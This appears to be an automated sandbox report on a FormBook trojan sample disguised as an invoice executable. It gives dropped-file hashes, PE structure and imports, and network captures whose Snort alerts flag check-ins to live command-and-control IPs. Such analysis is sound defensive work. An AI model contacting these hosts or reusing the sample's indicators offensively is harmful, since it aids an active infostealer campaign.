                                                        Preview: s..........o...Q&.../.U..z..y.M.......B......=....S....bB...S6...Y.R...E.B.^.-ix....7-.-.lRx......03Y..i.&.QP.Fq..*....!X..2.N.I.:.aM..9`$..uaHl.\k...a.m8..X..b...FQ..|.i.#Y-M....gs.t....N...P...n..fG..%....2........vU.....S.....9l......g.......?.XN.._..8`..R5.69b.y........m.5.v....Q.`.2r.3.%..Q....'H{..qs.V3.UAF.x....F.2&U.9s..:....G<L...Sw..I;.C...0X<].+.=g.2...!.%..l .U....J.nO.B....R...?..yxq....6.8=.L.!....:...~....6.$.`.Y.W..h...^.{a.S.n.,b.5..&..@89..pq...j..*.)uV.f.......sWICS....N|..mT...W#. .D#........;......5.E..S......`.......0.".D.\.....hA{.....ZVU.....g...9%...u.Sy.c).bB.<<,.:.I5...;A.^..s..&...i.....^..o.x._!..r..9.@..uC.n'D .D...c.........I.v......$w....Z.......Z...+....G.A...}....5......m..'.P..o..R.8..N..{3Q...8<y.(........{.O.N......*..`.....G.Z.....M..<-....O.c.L....Y^.9...CMj3......D.xC.!....i...<v.}F..}....K.7B...gj.T..zu.......=......G.....}......T.a.....`.....:.&..B.o...F..4..VAG...vC...CE..Z..b7..K
                                                        C:\Users\user\AppData\Local\Temp\k40o4d06bo6
                                                        Process:C:\Users\user\Desktop\INV74321.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6661
                                                        Entropy (8bit):7.969996174404535
                                                        Encrypted:false
                                                        SSDEEP:96:GWc65KZOCmbbSyasSocd7r8R5lFQk+vd2ilwhRMR/t+UdO1lKtnIMzlg+o5:PUtmH/orSjheDlwXMR/tFdO1stn3gt5
                                                        MD5:5ADEB3A9190FFDF42FE06B34B0F68928
                                                        SHA1:2C01B27F4595DEA6E70E733D5C264ABF054C9B9F
                                                        SHA-256:64AFFD574DE23B95A724A54208BD070EF00B2A049FF3A281338987D09F997F5E
                                                        SHA-512:4E398D7EDB98903456267761D0EF23880AEE5EC78A3C9F852480D0B22E90D48CBAC078EA11DF78B0A90BA84ADC03483820299BF475D5E510BC9FD31414A450F6
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview: .y.....-......{..r.->'...'....I..k.j....i....j...68[r}p.[.tE[MR..-.ze..c....]\...I...-...w.7.....c...J,.......k....54/......m'.!...<2I....US.bDs....#.3 V.MLG..Y. '...<'.Za)...=.U.\{=...0.......n:.SI.J....>.=....?.eemrtC..x..(..t.....|~.y..$.H..8...................J.....8.$JQk..#-.%.l......{.X..utoIJQF..gnaO.O|.....K..."..G.JUcas`............fiG.gT..k..3......g;2-...(..#%$.+!V........Y{N0...O7......ZE..p+.nb}.@....=.vy..../Z?...i....H.Qx,.....y...=.......`.I.;..h..+"....b..+.1...6%7.....y......=.....~qp..s .V.-.9....].*.{.&{.L...X..]sjuET.x.{.v=..na......'.K.F...>1..rT..._..7.......R..._Dy.a.....Z.#.69...,'.6.-BYF.3.../2.....Q|....]"._..XC.. '....tU3}|.j;../6b!.e"..5.ZK.u+...H.T..9.(.3U.....g..X.OQ.pV..L..+.l. ....:@........c.........]@..Y...W~...'...'QX..(..R..\"..k.....$.._QlG.4...,ymlXAnO|.n..s.*O.E.p........F.5.....N:....`k.R..........&)/6f8..-V..! ...-....U.[.H3.<FWm...\.G.L..A..ZED)k...e.e.j....F.b;.g,N.P.'.R..Y...x.......d>....v........
                                                        C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll
                                                        Process:C:\Users\user\Desktop\INV74321.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):4096
                                                        Entropy (8bit):4.257823721570018
                                                        Encrypted:false
                                                        SSDEEP:48:iYkYOn1ASkT3Jd95Ei4T53wz4KbCVhbmhnheBKbgXWoqsScz5dXm:ncn1ASkP34V3RKevKcXWoq7cz
                                                        MD5:792AB8BC6ED1C1B28D996EBDC1873E8C
                                                        SHA1:46D80F21EBA3150D206D9BDEF98FACD4867147AC
                                                        SHA-256:575C27017B612C76736D0B43645A8C942477B37BFD5CA34D6D82C004885283C4
                                                        SHA-512:18E7014BDF7264942A62C19A5B155ED5975AB822696CBBF3D9143EC8E2A8AE67569F9B4209CBCECDB6E0740579CBBA41294F89F2493D91D577CC7E01DEB32138
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Metadefender, Detection: 26%, Browse
                                                        • Antivirus: ReversingLabs, Detection: 55%
                                                        Reputation:low
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................PE..L....}.`...........!......................... ...............................@....................................... ..T....!....................................... ............................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):5.746555859558499
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:INV74321.exe
                                                        File size:579490
                                                        MD5:877bb5661fe79bb7f48cfb3ea54537a0
                                                        SHA1:dd6b5263da3b4f1a42e89c2c1ade852098561c5d
                                                        SHA256:87935ff36515ecb6a4177c25ad1d11e8d2882aa1c3f369e719406f063a062517
                                                        SHA512:a13e5bab1301b2f716945d526f1e1299b659fd2facb687fe1762348578e3d4a71993e97145481d35399f7fe369def77d5bfd4e32376b78a0116012f6370f8472
                                                        SSDEEP:6144:q9X0G6+bQSvddNYJ+WxzNvDozGbRE1RbQnBYYwKc7:c0f+bQWdNYZZDoGbREfbsuXKa
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...|......H3............@

                                                        File Icon

                                                        Icon Hash:e886a37159aadcf8

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x403348
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:ced282d9b261d1462772017fe2f6972b

                                                        Entrypoint Preview

                                                        Instruction
                                                        sub esp, 00000184h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+18h], ebx
                                                        mov dword ptr [esp+10h], 0040A198h
                                                        mov dword ptr [esp+20h], ebx
                                                        mov byte ptr [esp+14h], 00000020h
                                                        call dword ptr [004080B8h]
                                                        call dword ptr [004080BCh]
                                                        and eax, BFFFFFFFh
                                                        cmp ax, 00000006h
                                                        mov dword ptr [0042F42Ch], eax
                                                        je 00007F6884AB8B33h
                                                        push ebx
                                                        call 00007F6884ABBC96h
                                                        cmp eax, ebx
                                                        je 00007F6884AB8B29h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 004082A0h
                                                        push esi
                                                        call 00007F6884ABBC12h
                                                        push esi
                                                        call dword ptr [004080CCh]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], bl
                                                        jne 00007F6884AB8B0Dh
                                                        push 0000000Bh
                                                        call 00007F6884ABBC6Ah
                                                        push 00000009h
                                                        call 00007F6884ABBC63h
                                                        push 00000007h
                                                        mov dword ptr [0042F424h], eax
                                                        call 00007F6884ABBC57h
                                                        cmp eax, ebx
                                                        je 00007F6884AB8B31h
                                                        push 0000001Eh
                                                        call eax
                                                        test eax, eax
                                                        je 00007F6884AB8B29h
                                                        or byte ptr [0042F42Fh], 00000040h
                                                        push ebp
                                                        call dword ptr [00408038h]
                                                        push ebx
                                                        call dword ptr [00408288h]
                                                        mov dword ptr [0042F4F8h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+38h]
                                                        push 00000160h
                                                        push eax
                                                        push ebx
                                                        push 00429850h
                                                        call dword ptr [0040816Ch]
                                                        push 0040A188h

                                                        Rich Headers

                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x5add0.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x64570x6600False0.66823682598data6.43498570321IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rdata0x80000x13800x1400False0.4625data5.26100389731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xa0000x255380x600False0.463541666667data4.133728555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .rsrc0x380000x5add00x5ae00False0.0560468964924data3.59489590651IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_ICON0x382800x42028dataEnglishUnited States
                                                        RT_ICON0x7a2a80x10828dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                        RT_ICON0x8aad00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                        RT_ICON0x8ecf80x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                        RT_ICON0x912a00x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                        RT_ICON0x923480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                        RT_DIALOG0x927b00x100dataEnglishUnited States
                                                        RT_DIALOG0x928b00x11cdataEnglishUnited States
                                                        RT_DIALOG0x929d00x60dataEnglishUnited States
                                                        RT_GROUP_ICON0x92a300x5adataEnglishUnited States
                                                        RT_MANIFEST0x92a900x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                        Imports

                                                        DLLImport
                                                        ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                        SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                        ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                        USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                        GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                        KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        05/12/21-07:36:20.954955ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                        05/12/21-07:36:21.998903ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                        05/12/21-07:36:25.546082TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.3119.18.54.126
                                                        05/12/21-07:36:25.546082TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.3119.18.54.126
                                                        05/12/21-07:36:25.546082TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.3119.18.54.126
                                                        05/12/21-07:36:31.764293TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.3163.43.122.109
                                                        05/12/21-07:36:31.764293TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.3163.43.122.109
                                                        05/12/21-07:36:31.764293TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.3163.43.122.109
                                                        05/12/21-07:36:37.560160TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.3104.21.46.55
                                                        05/12/21-07:36:37.560160TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.3104.21.46.55
                                                        05/12/21-07:36:37.560160TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.3104.21.46.55
                                                        05/12/21-07:36:58.988852TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.364.190.62.111
                                                        05/12/21-07:36:58.988852TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.364.190.62.111
                                                        05/12/21-07:36:58.988852TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.364.190.62.111
                                                        05/12/21-07:37:04.217828TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.334.102.136.180
                                                        05/12/21-07:37:04.217828TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.334.102.136.180
                                                        05/12/21-07:37:04.217828TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.334.102.136.180
                                                        05/12/21-07:37:04.354921TCP1201ATTACK-RESPONSES 403 Forbidden804974134.102.136.180192.168.2.3

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        May 12, 2021 07:36:25.386116028 CEST4972780192.168.2.3119.18.54.126
                                                        May 12, 2021 07:36:25.545658112 CEST8049727119.18.54.126192.168.2.3
                                                        May 12, 2021 07:36:25.545857906 CEST4972780192.168.2.3119.18.54.126
                                                        May 12, 2021 07:36:25.546082020 CEST4972780192.168.2.3119.18.54.126
                                                        May 12, 2021 07:36:25.705415010 CEST8049727119.18.54.126192.168.2.3
                                                        May 12, 2021 07:36:25.815865040 CEST8049727119.18.54.126192.168.2.3
                                                        May 12, 2021 07:36:25.816132069 CEST4972780192.168.2.3119.18.54.126
                                                        May 12, 2021 07:36:25.816175938 CEST8049727119.18.54.126192.168.2.3
                                                        May 12, 2021 07:36:25.816235065 CEST4972780192.168.2.3119.18.54.126
                                                        May 12, 2021 07:36:25.975882053 CEST8049727119.18.54.126192.168.2.3
                                                        May 12, 2021 07:36:31.457963943 CEST4973380192.168.2.3163.43.122.109
                                                        May 12, 2021 07:36:31.763951063 CEST8049733163.43.122.109192.168.2.3
                                                        May 12, 2021 07:36:31.764115095 CEST4973380192.168.2.3163.43.122.109
                                                        May 12, 2021 07:36:31.764292955 CEST4973380192.168.2.3163.43.122.109
                                                        May 12, 2021 07:36:32.069766045 CEST8049733163.43.122.109192.168.2.3
                                                        May 12, 2021 07:36:32.071120977 CEST8049733163.43.122.109192.168.2.3
                                                        May 12, 2021 07:36:32.071140051 CEST8049733163.43.122.109192.168.2.3
                                                        May 12, 2021 07:36:32.071275949 CEST4973380192.168.2.3163.43.122.109
                                                        May 12, 2021 07:36:32.071352005 CEST4973380192.168.2.3163.43.122.109
                                                        May 12, 2021 07:36:32.378624916 CEST8049733163.43.122.109192.168.2.3
                                                        May 12, 2021 07:36:37.515737057 CEST4973480192.168.2.3104.21.46.55
                                                        May 12, 2021 07:36:37.556760073 CEST8049734104.21.46.55192.168.2.3
                                                        May 12, 2021 07:36:37.556889057 CEST4973480192.168.2.3104.21.46.55
                                                        May 12, 2021 07:36:37.560159922 CEST4973480192.168.2.3104.21.46.55
                                                        May 12, 2021 07:36:37.601880074 CEST8049734104.21.46.55192.168.2.3
                                                        May 12, 2021 07:36:37.612606049 CEST8049734104.21.46.55192.168.2.3
                                                        May 12, 2021 07:36:37.612651110 CEST8049734104.21.46.55192.168.2.3
                                                        May 12, 2021 07:36:37.612804890 CEST4973480192.168.2.3104.21.46.55
                                                        May 12, 2021 07:36:37.612955093 CEST4973480192.168.2.3104.21.46.55
                                                        May 12, 2021 07:36:37.654967070 CEST8049734104.21.46.55192.168.2.3
                                                        May 12, 2021 07:36:47.877574921 CEST4973680192.168.2.387.98.148.38
                                                        May 12, 2021 07:36:47.928168058 CEST804973687.98.148.38192.168.2.3
                                                        May 12, 2021 07:36:47.928282022 CEST4973680192.168.2.387.98.148.38
                                                        May 12, 2021 07:36:47.928524017 CEST4973680192.168.2.387.98.148.38
                                                        May 12, 2021 07:36:47.980168104 CEST804973687.98.148.38192.168.2.3
                                                        May 12, 2021 07:36:47.980216980 CEST804973687.98.148.38192.168.2.3
                                                        May 12, 2021 07:36:47.980243921 CEST804973687.98.148.38192.168.2.3
                                                        May 12, 2021 07:36:47.980434895 CEST4973680192.168.2.387.98.148.38
                                                        May 12, 2021 07:36:47.980536938 CEST4973680192.168.2.387.98.148.38
                                                        May 12, 2021 07:36:48.033574104 CEST804973687.98.148.38192.168.2.3
                                                        May 12, 2021 07:36:53.065385103 CEST4973780192.168.2.3154.84.101.247
                                                        May 12, 2021 07:36:53.337536097 CEST8049737154.84.101.247192.168.2.3
                                                        May 12, 2021 07:36:53.337632895 CEST4973780192.168.2.3154.84.101.247
                                                        May 12, 2021 07:36:53.337873936 CEST4973780192.168.2.3154.84.101.247
                                                        May 12, 2021 07:36:53.668983936 CEST8049737154.84.101.247192.168.2.3
                                                        May 12, 2021 07:36:53.850891113 CEST4973780192.168.2.3154.84.101.247
                                                        May 12, 2021 07:36:54.001211882 CEST8049737154.84.101.247192.168.2.3
                                                        May 12, 2021 07:36:54.001437902 CEST4973780192.168.2.3154.84.101.247
                                                        May 12, 2021 07:36:54.122675896 CEST8049737154.84.101.247192.168.2.3
                                                        May 12, 2021 07:36:54.124511003 CEST4973780192.168.2.3154.84.101.247
                                                        May 12, 2021 07:36:58.942466021 CEST4973880192.168.2.364.190.62.111
                                                        May 12, 2021 07:36:58.988545895 CEST804973864.190.62.111192.168.2.3
                                                        May 12, 2021 07:36:58.988671064 CEST4973880192.168.2.364.190.62.111
                                                        May 12, 2021 07:36:58.988852024 CEST4973880192.168.2.364.190.62.111
                                                        May 12, 2021 07:36:59.034358978 CEST804973864.190.62.111192.168.2.3
                                                        May 12, 2021 07:36:59.068284035 CEST804973864.190.62.111192.168.2.3
                                                        May 12, 2021 07:36:59.068312883 CEST804973864.190.62.111192.168.2.3
                                                        May 12, 2021 07:36:59.068438053 CEST4973880192.168.2.364.190.62.111
                                                        May 12, 2021 07:36:59.068619967 CEST4973880192.168.2.364.190.62.111
                                                        May 12, 2021 07:36:59.114044905 CEST804973864.190.62.111192.168.2.3
                                                        May 12, 2021 07:37:04.175647974 CEST4974180192.168.2.334.102.136.180
                                                        May 12, 2021 07:37:04.217358112 CEST804974134.102.136.180192.168.2.3
                                                        May 12, 2021 07:37:04.217525959 CEST4974180192.168.2.334.102.136.180
                                                        May 12, 2021 07:37:04.217828035 CEST4974180192.168.2.334.102.136.180
                                                        May 12, 2021 07:37:04.260392904 CEST804974134.102.136.180192.168.2.3
                                                        May 12, 2021 07:37:04.354921103 CEST804974134.102.136.180192.168.2.3
                                                        May 12, 2021 07:37:04.354943991 CEST804974134.102.136.180192.168.2.3
                                                        May 12, 2021 07:37:04.355241060 CEST4974180192.168.2.334.102.136.180
                                                        May 12, 2021 07:37:04.355380058 CEST4974180192.168.2.334.102.136.180
                                                        May 12, 2021 07:37:04.396428108 CEST804974134.102.136.180192.168.2.3

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        May 12, 2021 07:35:01.868086100 CEST6098553192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:01.925163031 CEST53609858.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:02.001374960 CEST5020053192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:02.094660044 CEST53502008.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:02.440005064 CEST5128153192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:02.493030071 CEST53512818.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:03.339555025 CEST4919953192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:03.389594078 CEST53491998.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:04.433197021 CEST5062053192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:04.484838009 CEST53506208.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:04.533371925 CEST6493853192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:04.591986895 CEST53649388.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:05.743690968 CEST6015253192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:05.792412996 CEST53601528.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:06.714699030 CEST5754453192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:06.766304970 CEST53575448.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:07.906347036 CEST5598453192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:07.957951069 CEST53559848.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:08.944035053 CEST6418553192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:09.001530886 CEST53641858.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:10.192361116 CEST6511053192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:10.241082907 CEST53651108.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:12.278356075 CEST5836153192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:12.333632946 CEST53583618.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:13.772128105 CEST6349253192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:13.820853949 CEST53634928.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:15.912441015 CEST6083153192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:15.964009047 CEST53608318.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:17.162112951 CEST6010053192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:17.213691950 CEST53601008.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:18.284503937 CEST5319553192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:18.336117029 CEST53531958.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:19.086713076 CEST5014153192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:19.135622025 CEST53501418.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:24.923013926 CEST5302353192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:24.973144054 CEST53530238.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:26.943756104 CEST4956353192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:26.992523909 CEST53495638.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:28.041414976 CEST5135253192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:28.090158939 CEST53513528.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:28.881341934 CEST5934953192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:28.932116985 CEST53593498.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:30.398412943 CEST5708453192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:30.447227001 CEST53570848.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:36.635267019 CEST5882353192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:36.697545052 CEST53588238.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:49.593894005 CEST5756853192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:49.666579008 CEST53575688.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:57.115423918 CEST5054053192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:57.172544003 CEST53505408.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:15.867855072 CEST5436653192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:16.878719091 CEST5436653192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:17.926945925 CEST5436653192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:19.941365004 CEST53543668.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:20.953538895 CEST53543668.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:21.998647928 CEST53543668.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:22.044761896 CEST5303453192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:22.105000973 CEST53530348.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:24.963274956 CEST5776253192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:25.373923063 CEST53577628.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:30.845324039 CEST5543553192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:31.245966911 CEST5071353192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:31.304512978 CEST53507138.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:31.456475019 CEST53554358.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:37.451916933 CEST5613253192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:37.514128923 CEST53561328.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:40.688345909 CEST5898753192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:40.745456934 CEST53589878.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:42.629811049 CEST5657953192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:42.784970045 CEST53565798.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:47.814141989 CEST6063353192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:47.875988960 CEST53606338.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:52.997044086 CEST6129253192.168.2.38.8.8.8
